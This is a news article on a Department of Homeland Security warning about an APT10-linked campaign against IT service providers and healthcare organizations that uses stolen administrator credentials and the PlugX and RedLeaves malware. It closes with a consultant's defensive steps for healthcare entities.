top of page

Homeland Security Issues Warning on Cyberattack Campaign

The Department of Homeland Security is warning IT services providers, healthcare organizations and three other business sectors about a sophisticated cyberattack campaign that involves using stolen administrative credentials and implanting malware, including PLUGX/SOGU and RedLeaves, on critical systems.

  • PlugX, a well-known espionage tool in use by several threat actors;

  • RedLeaves, a newly developed, fully-featured backdoor, first used by APT10 in recent months.

Mac McMillan, president of the security consulting firm CynergisTek, says the threat is serious. "These attacks could lead to full network compromise, long-term undetected attacks, and compromise/exploitation of systems and data, essentially putting both operations and patient safety at risk," he says.

The preliminary analysis has found that threat actors appear to be leveraging stolen administrative credentials - local and domain - and certificates. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.

DHS says the activity is still under investigation. The threat actors in this campaign have been observed employing a variety of tactics, techniques, and procedures. The actors use malware implants to acquire legitimate credentials then leverage those credentials to pivot throughout the local environment. NCCIC is aware of several compromises involving the exploitation of system administrators' credentials to access trusted domains as well as the malicious use of certificates.

Additionally, the adversary makes heavy use of PowerShell and the open source PowerSploit tool to enable assessment, reconnaissance, and lateral movement, the alert notes. In addition to leveraging user impersonation via compromised credentials the attackers are using malware implants left behind on key relay and staging machines, the alert states. In some instances, the malware has only been found within memory with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures. The observed malware includes PLUGX/SOGU and RedLeaves.

The attackers have modified the malware to "improve effectiveness and avoid detection by existing signatures," the alert notes. DHS warns successful network intrusion involving these attacks could result in temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files and potential harm to an organization's reputation.

A recent blog from BAE and PwC notes that the current campaign linked to APT10 (Chinese cyber espionage group) can be split into two sets of activity: Attacks targeting MSPs, engineering and other sectors with common as well as custom malware, and attacks targeting Japanese organizations with the 'ChChes' malware.

The attacks linked to APT10 targeting managed services providers use a custom dropper for their various implants, the researchers note. "This dropper makes use of dynamic-link library side-loading to execute the main payload." The researchers write their analysis shows the attackers have used several payloads, including PlugX and RedLeaves.

"Whilst these attackers have skill, persistence, some new tools and infrastructure - there is nothing about the techniques themselves that should make this hard to detect or mitigate. The lessons learned from these incidents should be used as an opportunity for security improvements for both MSPs and their customers," the blog says.

McMillan suggests that healthcare entities take the following steps to prevent falling victim to these attacks.

  1. Healthcare organizations should ensure that their service provider is looking for the indicators.

  2. Within own network assess for the presence of the detailed indicators in the NCCIC report.

  3. If an indicator of compromise is detected, take appropriate action to remediate and reach out to NCCIC for assistance and further details.

  4. Review the service provider contracts to ensure the vendor is monitoring actively.

Read full article at link below:

bottom of page